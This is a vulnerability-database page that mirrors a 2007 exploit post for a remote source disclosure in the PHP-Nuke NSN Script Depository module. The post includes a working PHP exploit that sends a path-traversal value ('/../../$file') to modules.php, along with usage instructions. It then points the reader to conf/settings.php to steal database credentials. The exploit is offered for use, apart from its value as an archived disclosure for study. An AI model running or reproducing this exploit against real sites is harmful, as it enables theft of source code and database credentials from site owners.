Lucene search
K

phpnukensn-disclose.txt

🗓️ 27 Nov 2007 00:00:00Reported by KiNgOfThEwOrLdType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure by KiNgOfThEwOrLd. Exploit allows remote retrieval of source files including database credentials

Code
`---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source Disclosure  
  
---------------------------------------------------------------  
  
#By KiNgOfThEwOrLd  
  
---------------------------------------------------------------  
Exploit  
  
<?  
/*  
Usage: 31337.php?targ=http://[target]/[phpnuke_path]&file=[file]  
Example: 31337.php?targ=http://victim.com/phpnuke&file=conf/settings.php  
*/  
$targ = $_GET['targ'];  
$file = $_GET['file'];  
echo '  
<form action="$targ/modules.php?name=Script_Depository" method="post">  
<input name="show_file" value="/../../$file" type="hidden">  
<input value="show_file" name="op" type="hidden">  
<input type="submit" value="Show Source">  
</form>';  
?>  
  
Trick  
  
In conf/settings.php there are the database credentials ;)  
---------------------------------------------------------------  
  
  
  
  
  
From: [email protected]   
Subject: Re: PHP-Nuke NSN Script Depository module <= 1.0.3 Remote Source / DB Credentials Disclosure   
sorry, i've made a mistake! only the versions <= 1.0.0 are veulnerable!   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Nov 2007 00:00Current
7.4High risk
Vulners AI Score7.4
20